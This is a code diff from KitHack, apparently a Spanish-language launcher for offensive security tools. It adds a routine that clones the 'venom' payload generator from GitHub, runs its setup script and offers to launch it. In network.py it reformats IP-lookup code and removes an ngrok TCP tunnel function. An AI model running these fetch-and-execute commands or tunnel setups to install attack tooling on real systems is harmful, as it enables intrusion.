print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/r00t-3xp10it/venom.git && cd venom && chmod +x * && bash setup.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/venom" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd venom && bash venom.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd venom && bash venom.sh") diff --git a/lib/network.py b/lib/network.py index 9c03794..4575341 100644 --- a/lib/network.py +++ b/lib/network.py @@ -1,74 +1,60 @@ #!/usr/bin/python3 # -*- coding: utf-8 -*- -#Copyright 2021 KITHACK -#Written by: Adrian Guillermo -#Facebook: Adrian Guillero -#Github: https://www.github.com/AdrMXR - -import socket -from urllib.request import urlopen +# Copyright 2021 KITHACK +# Written by: Adrian Guillermo +# Facebook: Adrian Guillero +# Github: https://www.github.com/AdrMXR import re import signal -from os import system as run_command, kill as kill_process, popen as sys_url +import socket +from os import kill as kill_process +from os import popen as sys_url +from os import system as run_command from pathlib import Path as pathlib_Path -from zenipy.zenipy import entry as entry_token, error as Error +from urllib.request import urlopen + from pgrep import pgrep as check_process +from zenipy.zenipy import entry as entry_token +from zenipy.zenipy import error as Error + +BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = ( + "\33[94m", + "\033[91m", + "\33[97m", + "\033[36m", + "\033[0m", + "\33[93m", + "\033[1;35m", + "\033[1;32m", + "\033[0m", + "\033[1m", +) -BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m' def local(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: - s.connect(('10.255.255.255', 1)) + s.connect(("10.255.255.255", 1)) IP = s.getsockname()[0] print("\n{0}Local IP: {1}{2}".format(GREEN, DEFAULT, IP)) except: - IP = '127.0.0.1' + IP = "127.0.0.1" finally: s.close() return IP + def public_ip(): lista = "0123456789." - ip="" - dato=urlopen("http://checkip.dyndns.org").read() + ip = "" + dato = urlopen("http://checkip.dyndns.org").read() for x in str(dato): - if x in lista: - ip += x - print("\n{0}Public IP: {1}{2}".format(GREEN, DEFAULT, ip)) - return ip + if x in lista: + ip += x + print("\n{0}Public IP: {1}{2}".format(GREEN, DEFAULT, ip)) + return ip -def run_ngrok(): - ngrok_config = pathlib_Path(".config/ngrok.yml") - if ngrok_config.exists(): - pid = check_process("ngrok") - for p in pid: - kill_process(p, signal.SIGKILL) - # Continue - run_command('./ngrok tcp -config=.config/ngrok.yml 443 > /dev/null 2>&1 &') - while True: - tcp = sys_url('curl -s -N http://127.0.0.1:4040/status | grep -o "tcp://[0-9]*.tcp.ngrok.io:[0-9]*"').read() - if re.match("tcp://[0-9]*.tcp.ngrok.io:[0-9]*", tcp) != None: - print("\n{0}Ngrok TCP: {1}{2}".format(GREEN, DEFAULT, tcp)) - break - else: - while True: - try: - token = entry_token(title="SET NGROK AUTHTOKEN", text="Register at https://ngrok.com\n", width=450, height=140) - if len(token) in range(40, 50): - ngrok_config.touch(mode=0o777, exist_ok=True) - ngrok_config = open('.config/ngrok.yml','w') - ngrok_config.write("authtoken: " + token) - ngrok_config.close() - run_ngrok() - break - else: - Error(text="Invalid token, please try again") - continue - except TypeError: #Evitar cierre de kithack - break def run_network(): local() public_ip() - run_ngrok()